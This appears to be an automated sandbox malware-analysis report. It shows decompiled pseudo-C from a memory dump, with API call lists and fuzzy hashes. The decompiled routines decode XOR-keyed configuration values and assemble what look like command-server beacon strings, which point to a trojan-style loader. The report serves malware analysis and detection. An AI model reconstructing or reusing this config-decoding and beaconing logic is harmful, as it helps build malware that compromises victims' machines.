                                                                                                                                  						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                                                                                                  							 *0x31ad280 = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t48 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t86 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  						_t48 = E031A3BB8(_t104, _t103, _t86 ^ 0x0cd926ce);
                                                                                                                                  					}
                                                                                                                                  					if(_t48 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                                                                                                                                  							 *0x31ad004 = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t49 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t82 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  						_t49 = E031A3BB8(_t104, _t103, _t82 ^ 0x3cd8b2cb);
                                                                                                                                  					}
                                                                                                                                  					if(_t49 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                                                                                                                                  							 *0x31ad02c = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t50 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t78 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  						_t50 = E031A3BB8(_t104, _t103, _t78 ^ 0x2878b929);
                                                                                                                                  					}
                                                                                                                                  					if(_t50 == 0) {
                                                                                                                                  						L41:
                                                                                                                                  						 *0x31ad284 = 5;
                                                                                                                                  						goto L42;
                                                                                                                                  					} else {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                                                                                                                                  							goto L41;
                                                                                                                                  						} else {
                                                                                                                                  							L42:
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_t51 = 0;
                                                                                                                                  							} else {
                                                                                                                                  								_t75 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  								_t51 = E031A3BB8(_t104, _t103, _t75 ^ 0x261a367a);
                                                                                                                                  							}
                                                                                                                                  							if(_t51 != 0) {
                                                                                                                                  								_push(_t51);
                                                                                                                                  								_t72 = 0x10;
                                                                                                                                  								_t73 = E031A49B8(_t72);
                                                                                                                                  								if(_t73 != 0) {
                                                                                                                                  									_push(_t73);
                                                                                                                                  									E031A4B98();
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_t52 = 0;
                                                                                                                                  							} else {
                                                                                                                                  								_t70 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  								_t52 = E031A3BB8(_t104, _t103, _t70 ^ 0xb9d404b2);
                                                                                                                                  							}
                                                                                                                                  							if(_t52 != 0 && E031A49B8(0, _t52) != 0) {
                                                                                                                                  								_t121 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  								E031A9311(_t121 + 4, _t68);
                                                                                                                                  							}
                                                                                                                                  							if(_t103 == 0) {
                                                                                                                                  								_t53 = 0;
                                                                                                                                  							} else {
                                                                                                                                  								_t65 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  								_t53 = E031A3BB8(_t104, _t103, _t65 ^ 0x3df17130);
                                                                                                                                  							}
                                                                                                                                  							if(_t53 == 0) {
                                                                                                                                  								L59:
                                                                                                                                  								_t54 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  								_t22 = _t54 + 0x31ae252; // 0x616d692f
                                                                                                                                  								 *0x31ad30c = _t22;
                                                                                                                                  								goto L60;
                                                                                                                                  							} else {
                                                                                                                                  								_t64 = E031A49B8(0, _t53);
                                                                                                                                  								 *0x31ad30c = _t64;
                                                                                                                                  								if(_t64 != 0) {
                                                                                                                                  									L60:
                                                                                                                                  									if(_t103 == 0) {
                                                                                                                                  										_t56 = 0;
                                                                                                                                  									} else {
                                                                                                                                  										_t61 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  										_t56 = E031A3BB8(_t104, _t103, _t61 ^ 0xd2079859);
                                                                                                                                  									}
                                                                                                                                  									if(_t56 == 0) {
                                                                                                                                  										_t57 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  										_t23 = _t57 + 0x31ae79a; // 0x6976612e
                                                                                                                                  										_t58 = _t23;
                                                                                                                                  									} else {
                                                                                                                                  										_t58 = E031A49B8(0, _t56);
                                                                                                                                  									}
                                                                                                                                  									 *0x31ad380 = _t58;
                                                                                                                                  									HeapFree( *0x31ad270, 0, _t103);
                                                                                                                                  									_v12 = 0;
                                                                                                                                  									goto L67;
                                                                                                                                  								}
                                                                                                                                  								goto L59;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x031a4dd9
                                                                                                                                  0x031a4dd9
                                                                                                                                  0x031a4de3
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4df4
                                                                                                                                  0x031a4df4
                                                                                                                                  0x031a4df6
                                                                                                                                  0x031a4e0c
                                                                                                                                  0x031a4df8
                                                                                                                                  0x031a4df8
                                                                                                                                  0x031a4e05
                                                                                                                                  0x031a4e05
                                                                                                                                  0x031a4e10
                                                                                                                                  0x031a4e12
                                                                                                                                  0x031a4e15
                                                                                                                                  0x031a4e16
                                                                                                                                  0x031a4e1d
                                                                                                                                  0x031a4e1f
                                                                                                                                  0x031a4e20
                                                                                                                                  0x031a4e20
                                                                                                                                  0x031a4e1d
                                                                                                                                  0x031a4e27
                                                                                                                                  0x031a4e3d
                                                                                                                                  0x031a4e29
                                                                                                                                  0x031a4e29
                                                                                                                                  0x031a4e36
                                                                                                                                  0x031a4e36
                                                                                                                                  0x031a4e41
                                                                                                                                  0x031a4e4f
                                                                                                                                  0x031a4e59
                                                                                                                                  0x031a4e59
                                                                                                                                  0x031a4e60
                                                                                                                                  0x031a4e76
                                                                                                                                  0x031a4e62
                                                                                                                                  0x031a4e62
                                                                                                                                  0x031a4e6f
                                                                                                                                  0x031a4e6f
                                                                                                                                  0x031a4e7a
                                                                                                                                  0x031a4e8d
                                                                                                                                  0x031a4e8d
                                                                                                                                  0x031a4e92
                                                                                                                                  0x031a4e98
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4e7c
                                                                                                                                  0x031a4e7f
                                                                                                                                  0x031a4e84
                                                                                                                                  0x031a4e8b
                                                                                                                                  0x031a4e9d
                                                                                                                                  0x031a4e9f
                                                                                                                                  0x031a4eb5
                                                                                                                                  0x031a4ea1
                                                                                                                                  0x031a4ea1
                                                                                                                                  0x031a4eae
                                                                                                                                  0x031a4eae
                                                                                                                                  0x031a4eb9
                                                                                                                                  0x031a4ec5
                                                                                                                                  0x031a4eca
                                                                                                                                  0x031a4eca
                                                                                                                                  0x031a4ebb
                                                                                                                                  0x031a4ebe
                                                                                                                                  0x031a4ebe
                                                                                                                                  0x031a4ed8
                                                                                                                                  0x031a4edd
                                                                                                                                  0x031a4ee3
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4ee3
                                                                                                                                  0x00000000
                                                                                                                                  0x031a4e8b
                                                                                                                                  0x031a4e7a
                                                                                                                                  0x031a4de3
                                                                                                                                  0x031a4dd7

                                                                                                                                  APIs
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4CE5
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4D17
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4D49
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4D7B
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4DAD
                                                                                                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008), ref: 031A4DDF
                                                                                                                                  • HeapFree.KERNEL32(00000000,031A5390,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008,?,031A5390), ref: 031A4EDD
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005,031AD00C,00000008,?,031A5390), ref: 031A4EF0
                                                                                                                                    • Part of subcall function 031A49B8: lstrlen.KERNEL32(69B25F44,00000000,7673D3B0,031A5390,031A4EC3,00000000,031A5390,?,69B25F44,?,031A5390,69B25F44,?,031A5390,69B25F44,00000005), ref: 031A49C1
                                                                                                                                    • Part of subcall function 031A49B8: memcpy.NTDLL(00000000,?,00000000,00000001,?,031A5390), ref: 031A49E4
                                                                                                                                    • Part of subcall function 031A49B8: memset.NTDLL ref: 031A49F3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap$lstrlenmemcpymemset
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3442150357-8415677
                                                                                                                                  • Opcode ID: a23a656c855cc493df98729c225e701fedb516e418ab8a46dddedd513fbbb351
                                                                                                                                  • Instruction ID: 86d42f35a6f99382863d7dfe7400110ebe18da827e3abe704f52de24b3256c14
                                                                                                                                  • Opcode Fuzzy Hash: a23a656c855cc493df98729c225e701fedb516e418ab8a46dddedd513fbbb351
                                                                                                                                  • Instruction Fuzzy Hash: 6981A77CA00E04AFC724EB7D9D84D5BB7E9AB9C2037294956A001D7308EFB5D585CB70
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E8E5
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,6E93EB6A,00000002,00000000,?,?,?,6E93EB6A,?,00000000), ref: 6E93E90E
                                                                                                                                  • GetACP.KERNEL32(?,?,6E93EB6A,?,00000000), ref: 6E93E923
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                  • Opcode ID: 528e70ea6b280fc0c9d4fa7d6c2c0b33d1f9c4e43785245e2f54040ac8df5746
                                                                                                                                  • Instruction ID: 4318d4e15fb3c2a6cba4e2a94113be2d0a92a1864bfaa58d4dacbab557bf9533
                                                                                                                                  • Opcode Fuzzy Hash: 528e70ea6b280fc0c9d4fa7d6c2c0b33d1f9c4e43785245e2f54040ac8df5746
                                                                                                                                  • Instruction Fuzzy Hash: 5921D822E54325EAD7A48BD9C901BCB77BFEF45B54B624824E905D7508F732DD40CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E93E163
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E9325B5,?,?,?,00000055,?,-00000050,?,?), ref: 6E93E18E
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E222
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 6E93E230
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E93E2F1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4147378913-0
                                                                                                                                  • Opcode ID: b7ccbf756afd1235c603d63803efddbfc3f85b8f2d475f29ea42c6c316d65779
                                                                                                                                  • Instruction ID: c6d8739dd68596a371a97e8dcb328ee0b019f3e5ea5c901a74b8c575f3f97c1a
                                                                                                                                  • Opcode Fuzzy Hash: b7ccbf756afd1235c603d63803efddbfc3f85b8f2d475f29ea42c6c316d65779
                                                                                                                                  • Instruction Fuzzy Hash: 58710571604326AAEB659BF5CC55BAB73ACEF95304F30082AE919D7280EB70ED40CF51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F2FB
                                                                                                                                    • Part of subcall function 6E92F299: _free.LIBCMT ref: 6E92F331
                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E93EB2D
                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 6E93EB76
                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 6E93EB85
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E93EBCD
                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E93EBEC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 949163717-0
                                                                                                                                  • Opcode ID: 7af66fcf98f5528ca507f73db67ae565f8670467942e9f1eca80f2f755f21ac8
                                                                                                                                  • Instruction ID: f5b76edcd0818ccb7702ed09539865fab5fd7df22fd364fd79be819ae7d38921
                                                                                                                                  • Opcode Fuzzy Hash: 7af66fcf98f5528ca507f73db67ae565f8670467942e9f1eca80f2f755f21ac8
                                                                                                                                  • Instruction Fuzzy Hash: B7515B71A0072AABEF51DFE6CC44AAEB7BCBF59304F24046AA911E7180E770DD408F61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E906CB6
                                                                                                                                  • collate.LIBCPMT ref: 6E906CBF
                                                                                                                                    • Part of subcall function 6E9059D8: __EH_prolog3_GS.LIBCMT ref: 6E9059DF
                                                                                                                                    • Part of subcall function 6E9059D8: __Getcoll.LIBCPMT ref: 6E905A43
                                                                                                                                    • Part of subcall function 6E9059D8: std::_Locinfo::~_Locinfo.LIBCPMT ref: 6E905A5F
                                                                                                                                  • __Getcoll.LIBCPMT ref: 6E906D05
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D19
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D2E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D7F
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EB4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EC7
                                                                                                                                  • int.LIBCPMT ref: 6E906ED4
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906EE4
                                                                                                                                  • int.LIBCPMT ref: 6E906EF1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F01
                                                                                                                                  • int.LIBCPMT ref: 6E906F0E
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F1E
                                                                                                                                  • int.LIBCPMT ref: 6E906CDF
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E8F208C
                                                                                                                                    • Part of subcall function 6E8F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E8F20A6
                                                                                                                                  • int.LIBCPMT ref: 6E906D42
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906D6C
                                                                                                                                  • int.LIBCPMT ref: 6E906D97
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DC5
                                                                                                                                  • int.LIBCPMT ref: 6E906DD2
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906DF9
                                                                                                                                  • int.LIBCPMT ref: 6E906E06
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906E56
                                                                                                                                  • int.LIBCPMT ref: 6E906E63
                                                                                                                                  • int.LIBCPMT ref: 6E906F36
                                                                                                                                  • numpunct.LIBCPMT ref: 6E906F5D
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906F6D
                                                                                                                                  • int.LIBCPMT ref: 6E906F7A
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FB1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FC4
                                                                                                                                  • int.LIBCPMT ref: 6E906FD1
                                                                                                                                  • std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 6E906FE1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddfacLocimp::_Locimp_std::locale::_$std::_$GetcollLockit$H_prolog3H_prolog3_LocinfoLocinfo::~_Lockit::_Lockit::~_collatenumpunct
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2009638416-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E031A6109(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				void* _v28;
                                                                                                                                  				void* __ebx;
                                                                                                                                  				void* __edi;
                                                                                                                                  				long _t59;
                                                                                                                                  				intOrPtr _t60;
                                                                                                                                  				intOrPtr _t61;
                                                                                                                                  				intOrPtr _t62;
                                                                                                                                  				intOrPtr _t63;
                                                                                                                                  				intOrPtr _t64;
                                                                                                                                  				void* _t67;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				int _t71;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t73;
                                                                                                                                  				void* _t75;
                                                                                                                                  				void* _t78;
                                                                                                                                  				intOrPtr _t82;
                                                                                                                                  				intOrPtr _t86;
                                                                                                                                  				intOrPtr* _t88;
                                                                                                                                  				void* _t94;
                                                                                                                                  				intOrPtr _t100;
                                                                                                                                  				signed int _t104;
                                                                                                                                  				char** _t106;
                                                                                                                                  				int _t109;
                                                                                                                                  				intOrPtr* _t112;
                                                                                                                                  				intOrPtr* _t114;
                                                                                                                                  				intOrPtr* _t116;
                                                                                                                                  				intOrPtr* _t118;
                                                                                                                                  				intOrPtr _t121;
                                                                                                                                  				intOrPtr _t126;
                                                                                                                                  				int _t130;
                                                                                                                                  				CHAR* _t132;
                                                                                                                                  				intOrPtr _t133;
                                                                                                                                  				void* _t134;
                                                                                                                                  				void* _t143;
                                                                                                                                  				int _t144;
                                                                                                                                  				void* _t145;
                                                                                                                                  				intOrPtr _t146;
                                                                                                                                  				void* _t148;
                                                                                                                                  				long _t152;
                                                                                                                                  				intOrPtr* _t153;
                                                                                                                                  				intOrPtr* _t154;
                                                                                                                                  				intOrPtr* _t157;
                                                                                                                                  				void* _t158;
                                                                                                                                  				void* _t160;
                                                                                                                                  
                                                                                                                                  				_t143 = __edx;
                                                                                                                                  				_t134 = __ecx;
                                                                                                                                  				_t59 = __eax;
                                                                                                                                  				_v12 = 8;
                                                                                                                                  				if(__eax == 0) {
                                                                                                                                  					_t59 = GetTickCount();
                                                                                                                                  				}
                                                                                                                                  				_t60 =  *0x31ad018; // 0x53709a90
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t61 =  *0x31ad014; // 0x3a87c8cd
                                                                                                                                  				_t132 = _a16;
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t62 =  *0x31ad010; // 0xd8d2f808
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t63 =  *0x31ad00c; // 0xeec43f25
                                                                                                                                  				asm("bswap eax");
                                                                                                                                  				_t64 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  				_t3 = _t64 + 0x31ae633; // 0x74666f73
                                                                                                                                  				_t144 = wsprintfA(_t132, _t3, 3, 0x3f874, _t63, _t62, _t61, _t60,  *0x31ad02c,  *0x31ad004, _t59);
                                                                                                                                  				_t67 = E031A5B60();
                                                                                                                                  				_t68 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  				_t4 = _t68 + 0x31ae673; // 0x74707526
                                                                                                                                  				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                                                                                                                  				_t160 = _t158 + 0x38;
                                                                                                                                  				_t145 = _t144 + _t71;
                                                                                                                                  				_t72 = E031A1BBF(_t134);
                                                                                                                                  				_t133 = __imp__; // 0x74e05520
                                                                                                                                  				_v8 = _t72;
                                                                                                                                  				if(_t72 != 0) {
                                                                                                                                  					_t126 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					_t7 = _t126 + 0x31ae8cc; // 0x736e6426
                                                                                                                                  					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                                                                                                                  					_t160 = _t160 + 0xc;
                                                                                                                                  					_t145 = _t145 + _t130;
                                                                                                                                  					HeapFree( *0x31ad270, 0, _v8);
                                                                                                                                  				}
                                                                                                                                  				_t73 = E031A137A();
                                                                                                                                  				_v8 = _t73;
                                                                                                                                  				if(_t73 != 0) {
                                                                                                                                  					_t121 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  					_t11 = _t121 + 0x31ae8d4; // 0x6f687726
                                                                                                                                  					wsprintfA(_t145 + _a16, _t11, _t73);
                                                                                                                                  					_t160 = _t160 + 0xc;
                                                                                                                                  					HeapFree( *0x31ad270, 0, _v8);
                                                                                                                                  				}
                                                                                                                                  				_t146 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  				_t75 = E031A3857(0x31ad00a, _t146 + 4);
                                                                                                                                  				_t152 = 0;
                                                                                                                                  				_v20 = _t75;
                                                                                                                                  				if(_t75 == 0) {
                                                                                                                                  					L26:
                                                                                                                                  					HeapFree( *0x31ad270, _t152, _a16);
                                                                                                                                  					return _v12;
                                                                                                                                  				} else {
                                                                                                                                  					_t78 = RtlAllocateHeap( *0x31ad270, 0, 0x800);
                                                                                                                                  					_v8 = _t78;
                                                                                                                                  					if(_t78 == 0) {
                                                                                                                                  						L25:
                                                                                                                                  						HeapFree( *0x31ad270, _t152, _v20);
                                                                                                                                  						goto L26;
                                                                                                                                  					}
                                                                                                                                  					E031AA811(GetTickCount());
                                                                                                                                  					_t82 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  					__imp__(_t82 + 0x40);
                                                                                                                                  					asm("lock xadd [eax], ecx");
                                                                                                                                  					_t86 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  					__imp__(_t86 + 0x40);
                                                                                                                                  					_t88 =  *0x31ad364; // 0x5bd95b0
                                                                                                                                  					_t148 = E031A1974(1, _t143, _a16,  *_t88);
                                                                                                                                  					_v28 = _t148;
                                                                                                                                  					asm("lock xadd [eax], ecx");
                                                                                                                                  					if(_t148 == 0) {
                                                                                                                                  						L24:
                                                                                                                                  						HeapFree( *0x31ad270, _t152, _v8);
                                                                                                                                  						goto L25;
                                                                                                                                  					}
                                                                                                                                  					StrTrimA(_t148, 0x31ac2ac);
                                                                                                                                  					_push(_t148);
                                                                                                                                  					_t94 = E031A38CA();
                                                                                                                                  					_v16 = _t94;
                                                                                                                                  					if(_t94 == 0) {
                                                                                                                                  						L23:
                                                                                                                                  						HeapFree( *0x31ad270, _t152, _t148);
                                                                                                                                  						goto L24;
                                                                                                                                  					}
                                                                                                                                  					_t153 = __imp__;
                                                                                                                                  					 *_t153(_t148, _a4);
                                                                                                                                  					 *_t153(_v8, _v20);
                                                                                                                                  					_t154 = __imp__;
                                                                                                                                  					 *_t154(_v8, _v16);
                                                                                                                                  					_t100 = E031A1922( *_t154(_v8, _t148), _v8);
                                                                                                                                  					_a4 = _t100;
                                                                                                                                  					if(_t100 == 0) {
                                                                                                                                  						_v12 = 8;
                                                                                                                                  						L21:
                                                                                                                                  						E031A47D5();
                                                                                                                                  						L22:
                                                                                                                                  						HeapFree( *0x31ad270, 0, _v16);
                                                                                                                                  						_t152 = 0;
                                                                                                                                  						goto L23;
                                                                                                                                  					}
                                                                                                                                  					_t104 = E031A365D(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                                                                                                                  					_v12 = _t104;
                                                                                                                                  					if(_t104 == 0) {
                                                                                                                                  						_t157 = _v24;
                                                                                                                                  						_v12 = E031A3273(_t157, _a4, _a8, _a12);
                                                                                                                                  						_t112 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                  						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                                                                                                                  						_t114 =  *((intOrPtr*)(_t157 + 8));
                                                                                                                                  						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                                                                                                                  						_t116 =  *((intOrPtr*)(_t157 + 4));
                                                                                                                                  						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                                                                                                                  						_t118 =  *_t157;
                                                                                                                                  						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                                                                                                                  						E031A4AAB(_t157);
                                                                                                                                  					}
                                                                                                                                  					if(_v12 != 0x10d2) {
                                                                                                                                  						L16:
                                                                                                                                  						if(_v12 == 0) {
                                                                                                                                  							_t106 = _a8;
                                                                                                                                  							if(_t106 != 0) {
                                                                                                                                  								_t149 =  *_t106;
                                                                                                                                  								_t155 =  *_a12;
                                                                                                                                  								wcstombs( *_t106,  *_t106,  *_a12);
                                                                                                                                  								_t109 = E031A8FB2(_t149, _t149, _t155 >> 1);
                                                                                                                                  								_t148 = _v28;
                                                                                                                                  								 *_a12 = _t109;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						goto L19;
                                                                                                                                  					} else {
                                                                                                                                  						if(_a8 != 0) {
                                                                                                                                  							L19:
                                                                                                                                  							E031A4AAB(_a4);
                                                                                                                                  							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                  								goto L22;
                                                                                                                                  							} else {
                                                                                                                                  								goto L21;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_v12 = _v12 & 0x00000000;
                                                                                                                                  						goto L16;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 031A611D
                                                                                                                                  • wsprintfA.USER32 ref: 031A616D
                                                                                                                                  • wsprintfA.USER32 ref: 031A618A
                                                                                                                                  • wsprintfA.USER32 ref: 031A61B6
                                                                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 031A61C8
                                                                                                                                  • wsprintfA.USER32 ref: 031A61E9
